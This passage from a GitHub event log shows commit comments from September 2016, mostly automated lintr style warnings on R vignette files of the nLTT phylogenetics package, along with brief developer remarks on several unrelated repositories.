~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:33:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L33) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L37) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:39:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L39) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:42:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L42) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:48:27:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:50:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L50) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:52:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L52) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:55:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L55) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:57:27:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:58:37:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:61:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L61) *style:* **lines should not be more than 80 characters.**\n```r\n​newick <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:64:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L64) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:66:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L66) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:69:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_stretch_nltt_matrix.R#L69) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2016-09-14T08:45:42Z"}
{"id":"4560630027","type":"CommitCommentEvent","actor":{"login":"bgcngm"},"repo":{"name":"CyanogenMod/android_device_xiaomi_gemini"},"payload":{"comment":{"id":19014602,"position":null,"line":null,"path":null,"commit_id":"c9d477fece3853195a04afeb7eeb4c4d5aeca168","created_at":"2016-09-14T08:45:58Z","updated_at":"2016-09-14T08:45:58Z","body":"I'll stick to what motivated the change:\r\n\r\n\"This is an overall more user-friendly layout.\r\nFortunatelly Xiaomi didn't put any patterns over the buttons,\r\nso this change can be done without causing an aesthetic problem.\""}},"created_at":"2016-09-14T08:45:58Z"}
{"id":"4560630791","type":"CommitCommentEvent","actor":{"login":"iMaruf"},"repo":{"name":"iMaruf/JavaBasicLearnning"},"payload":{"comment":{"id":19014605,"position":null,"line":null,"path":null,"commit_id":"f3aa508f27e51cceab62cff735c684f145005dc1","created_at":"2016-09-14T08:46:08Z","updated_at":"2016-09-14T08:46:08Z","body":"Thank you for your advice and feed back.I will learn it more and fix it as soon as possible."}},"created_at":"2016-09-14T08:46:08Z"}
{"id":"4560633085","type":"CommitCommentEvent","actor":{"login":"lalitg14"},"repo":{"name":"yusuke/twitter4j"},"payload":{"comment":{"id":19014610,"position":null,"line":null,"path":null,"commit_id":"03f796730587ce938f9cbedf9763cbb4e6b52319","created_at":"2016-09-14T08:46:37Z","updated_at":"2016-09-14T08:46:37Z","body":"Hi,\r\nHas this fix been is part of v 4.0.5?"}},"created_at":"2016-09-14T08:46:37Z"}
{"id":"4560636035","type":"CommitCommentEvent","actor":{"login":"ramidzkh"},"repo":{"name":"Bssentials/Bssentials-2"},"payload":{"comment":{"id":19014619,"position":null,"line":null,"path":null,"commit_id":"3e4c2d5ad84246d6636f9ac065e32ee898b02568","created_at":"2016-09-14T08:47:15Z","updated_at":"2016-09-14T08:47:15Z","body":"Typo It's <code>pom.xml</code>"}},"created_at":"2016-09-14T08:47:15Z"}
{"id":"4560636069","type":"CommitCommentEvent","actor":{"login":"candes003"},"repo":{"name":"candes003/test3"},"payload":{"comment":{"id":19014620,"position":3,"line":3,"path":"test3.html","commit_id":"b6ffde7cc6d5e6ee2a4a68432ffd406722de6390","created_at":"2016-09-14T08:47:15Z","updated_at":"2016-09-14T08:47:15Z","body":"uni su tigdagdag ko"}},"created_at":"2016-09-14T08:47:15Z"}
{"id":"4560636588","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19014622,"position":136,"line":136,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T08:47:21Z","updated_at":"2016-09-14T08:47:21Z","body":"同上上"}},"created_at":"2016-09-14T08:47:21Z"}
{"id":"4560639115","type":"CommitCommentEvent","actor":{"login":"candes003"},"repo":{"name":"candes003/test3"},"payload":{"comment":{"id":19014625,"position":null,"line":null,"path":null,"commit_id":"b6ffde7cc6d5e6ee2a4a68432ffd406722de6390","created_at":"2016-09-14T08:47:49Z","updated_at":"2016-09-14T08:47:49Z","body":"additional dummy texts"}},"created_at":"2016-09-14T08:47:49Z"}
{"id":"4560640721","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014631,"position":null,"line":null,"path":null,"commit_id":"8702303571106ac4cc63eaeddd2ae014609b5e31","created_at":"2016-09-14T08:48:09Z","updated_at":"2016-09-14T08:48:09Z","body":"Related to: backdrop/backdrop-issues#1373 "}},"created_at":"2016-09-14T08:48:09Z"}
{"id":"4560640742","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014632,"position":null,"line":null,"path":null,"commit_id":"9e241e09605994168a58e31c44b1bee9697c6b23","created_at":"2016-09-14T08:48:10Z","updated_at":"2016-09-14T08:48:10Z","body":"Related to: backdrop/backdrop-issues#1373 "}},"created_at":"2016-09-14T08:48:10Z"}
{"id":"4560642785","type":"CommitCommentEvent","actor":{"login":"mgupta250"},"repo":{"name":"mgupta250/lrscripts"},"payload":{"comment":{"id":19014638,"position":null,"line":null,"path":null,"commit_id":"258464cbc03719b52f71f70a32ee561c774be678","created_at":"2016-09-14T08:48:33Z","updated_at":"2016-09-14T08:48:33Z","body":"aa"}},"created_at":"2016-09-14T08:48:33Z"}
{"id":"4560644125","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19014639,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-14T08:48:51Z","updated_at":"2016-09-14T08:48:51Z","body":"Partially reverted in https://github.com/LimeSurvey/LimeSurvey/commit/b39ad5f0c9092dc004d82dde7389d6f12c30a81f .\r\n\r\n@maziminke : you delete your comment ? You're tracked ;)"}},"created_at":"2016-09-14T08:48:51Z"}
{"id":"4560646333","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":19014648,"position":null,"line":null,"path":null,"commit_id":"9fef3e5d72fd2c1b58c2015690e548bb32baffe8","created_at":"2016-09-14T08:49:20Z","updated_at":"2016-09-14T08:49:20Z","body":"OK. I have two clones, one for the program code and one for the gh-pages. This avoids the problem of directories not being deleted.\r\n\r\nFor running it locally, you can pass baseurl as parameter. I do\r\n```\r\njekyll serve --watch --baseurl=\"\" --trace\r\n```"}},"created_at":"2016-09-14T08:49:20Z"}
{"id":"4560651284","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014656,"position":null,"line":null,"path":null,"commit_id":"8b7803a9980ea2daed021ba72a869fa5aadacb5b","created_at":"2016-09-14T08:50:25Z","updated_at":"2016-09-14T08:50:25Z","body":"Related to: backdrop/backdrop-issues#1373 "}},"created_at":"2016-09-14T08:50:25Z"}
{"id":"4560651303","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014657,"position":null,"line":null,"path":null,"commit_id":"7561fb2eeb1bc1e349c4fdca6656353c789de254","created_at":"2016-09-14T08:50:26Z","updated_at":"2016-09-14T08:50:26Z","body":"Related to: backdrop/backdrop-issues#1373 "}},"created_at":"2016-09-14T08:50:26Z"}
{"id":"4560654761","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19014666,"position":null,"line":null,"path":null,"commit_id":"e0e236aff24d63d71c830077828c13ce7c618269","created_at":"2016-09-14T08:51:07Z","updated_at":"2016-09-14T08:51:07Z","body":"[inst/doc/trees_with_root_edge.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/trees_with_root_edge.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/trees_with_root_edge.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/trees_with_root_edge.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:14:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/trees_with_root_edge.R#L14) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:18:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/trees_with_root_edge.R#L18) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/trees_with_root_edge.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:25:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/trees_with_root_edge.R#L25) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:3:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L3) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:9:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L9) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:16:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L16) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:29:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L29) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:31:47:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L31) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny1), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:32:13:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            ^\n```\n[inst/doc/vignette_get_average_nltt.R:36:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L36) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:38:47:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny2), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:39:13:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L39) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            ^\n```\n[inst/doc/vignette_get_average_nltt.R:43:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L43) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:61:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L61) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:74:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L74) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:79:47:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L79) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny1), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:80:13:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            ^\n```\n[inst/doc/vignette_get_average_nltt.R:84:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L84) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:86:47:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny2), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:87:13:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L87) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            ^\n```\n[inst/doc/vignette_get_average_nltt.R:91:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L91) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:94:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L94) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:96:29:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L96) *style:* **Trailing whitespace is superfluous.**\n```r\n​  c(phylogeny1, phylogeny2), \n                            ^\n```\n[inst/doc/vignette_get_average_nltt.R:97:13:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_average_nltt.R#L97) *style:* **Trailing whitespace is superfluous.**\n```r\n​  dt = 0.20, \n            